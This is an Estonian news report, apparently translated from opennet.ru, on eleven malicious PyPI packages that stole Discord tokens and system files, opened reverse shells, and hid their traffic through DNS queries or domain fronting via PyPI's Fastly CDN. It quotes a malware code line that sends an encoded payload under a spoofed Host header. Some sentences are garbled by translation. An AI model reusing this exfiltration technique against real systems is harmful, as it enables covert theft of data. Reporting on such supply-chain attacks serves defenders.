PyPI kataloogis tuvastati pahatahtlikud teegid, mis kasutavad PyPI CDN-i, et peita sidekanalit.

PyPI (Python Package Index) kataloogis leiti 11 paketti, mis sisaldasid pahavara. Probleemide avastamise eelnevalt suudeti need paketid kokku laadida umbes 38 000 korda. Tuvastatud pahavara paketid eristuvad keerukate meetodite kasutamisest, et varjata ĂŒhendusi pahatahtlike serveritega.

  • importantpackage (6305 laadimist), important-package (12897) — kehtestasid ĂŒhenduse vĂ€lise serveriga, esinedes pypi.python.org'ina, et anda shell-juurdepÀÀs sĂŒsteemile (reverse shell) ja kasutasid ĂŒhenduse varjamiseks programmi trevorc2.
  • pptest (10001), ipboards (946) — kasutasid DNS-i suhte loomise kanalina sĂŒsteemi teabe edastamiseks (esimeses paketis hosti nimi, töökaust, sise- ja vĂ€lis-IP, teises — kasutaja ja hosti nimi).
  • owlmoon (3285), DiscordSafety (557), yiffparty (1859) — tuvastasid sĂŒsteemis Discordi teenuse tokeni ja edastasid selle vĂ€lisele hostile.
  • trrfab (287) — saatis vĂ€lisele hostile identifikaatori, hosti nime ja sisu /etc/passwd, /etc/hosts, /home.
  • 10Cent10 (490) — kehtestas tagasipöörde shell-ĂŒhenduse vĂ€lise hostiga.
  • yandex-yt (4183) — edastas sĂ”numi sĂŒsteemi kompromiteerimise kohta ja suunatud lehele, kus oli lisainformatsioon edasiste tegevuste kohta, antud lĂ€bi nda.ya.ru (api.ya.cc).

Eraldi tĂ€helepanu vÀÀrib meetod, millega pakettides importantpackage ja important-package suheldi vĂ€liste hostidega, kasutades oma tegevuse varjamiseks sisuhulga edastamisvĂ”rku Fastly, mis on kasutusel PyPI kataloogis. Tegelikult saadeti pĂ€ringud serverisse pypi.python.org (sealhulgas, viidates python.org nimele SNI-s HTTPS-pĂ€ringus), kuid samal ajal seati HTTP-pealkirjas 'Host' rĂŒndealusele kontrollitava serveri nimi (sec.forward.io.global.prod.fastly.net). Sisu edastamise ajal suunas edastamisevĂ”rk sarnase pĂ€ringu rĂŒndajate serverisse, kasutades edastamisel pypi.python.org-i TLS-ĂŒhenduse parameetreid.

PyPI infrastruktuuri töö tagab edastamisvĂ”rk Fastly, kus tavaliste pĂ€ringute vahemĂ€lu haldamiseks kasutatakse lĂ€bipaistvat proksi Varnishit, samuti tehakse TLS-sertifikaatide töötlemist CDN-i tasemel, mitte lĂ”ppserveritel, et korraldada HTTPS-pĂ€ringute edastamine proksi kaudu. ÜkskĂ”ik millise sihthostiga saadetakse pĂ€ringud proksisse, mis mÀÀrab vajaliku hosti HTTP-pealkirja 'Host' pĂ”hjal. domeenide nimed hostid siduvad kĂ”igile klientidele tĂŒĂŒpilistele Fastly IP-aadressidele koormuse tasakaalustajate CDN.

RĂŒndajate server registreeritakse ka Fastly CDN-is, mis pakub kĂ”igile tasuta hindade plaane ja isegi lubab anonĂŒĂŒmset registreerimist. TĂ€helepanuvÀÀrne on see, et sihtmĂ€rgile pĂ€ringute saatmiseks 'reverse shell'i' loomisel kasutatakse samuti skeemi, kuid algatatakse see pahategija kĂŒlje poolt. Serveri suhtlemine rĂŒndaja poolelt paistab vĂ€lja nagu legitiimne sessioon PyPI kataloogiga, mis on krĂŒpteeritud, kasutades TLS-sertifikaati PyPI. Sarnane tehnika, tuntud nimega 'domain fronting', kasutati varem aktiivselt hostinime varjamiseks blokeeringute ĂŒletamisel, kasutades mĂ”nedes CDN-vĂ”rkudes vĂ”imalust suhelda HTTPS-i kaudu, mÀÀrates SNI-s vale hosti ning edastades tegeliku pĂ€ritava hosti nime HTTP pĂ€ises Host TLS-sessioni sees.

PyPI kataloogis tuvastati pahatahtlikud teegid, mis kasutavad PyPI CDN-i, et peita sidekanalit.

Kahjuliku tegevuse varjamiseks kasutati tÀiendavalt paketti TrevorC2, mis vÔimaldab muuta suhtlemise serveriga sarnaseks tavapÀrase veebibrauseriga navigeerimisega, nÀiteks saatmata kahjulikke pÀringuid kui 'https://pypi.python.org/images/guid=' ja kodeerides teavet guid parameetris. url = 'https://pypi.python.org' + '/images' + '?' + 'guid=' + b64_payload r = request.Request(url, headers = {'Host': 'psec.forward.io.global.prod.fastly.net'})

Pakettides pptest ja ipboards kasutati teistsugust lÀhenemist vÔrguaktiivsuse varjamiseks, mis pÔhines kasuliku teabe kodeerimisel DNS-serveri pÀringutes. Kahjulik tarkvara edastab teavet, tehes DNS-pÀringud nagu 'nu4timjagq4fimbuhe.example.com', mille alamsaadetes on base64 formaadis kodeeritud edastatavad andmed juhtimisseerverisse. Kurjategija vÔtab vastu sÔnumite andmed, kontrollides DNS-serverit domeeni example.com.

Allikas: opennet.ru

Osta usaldusvÀÀrne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid đŸ”„ Osta usaldusvÀÀrne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid | ProHoster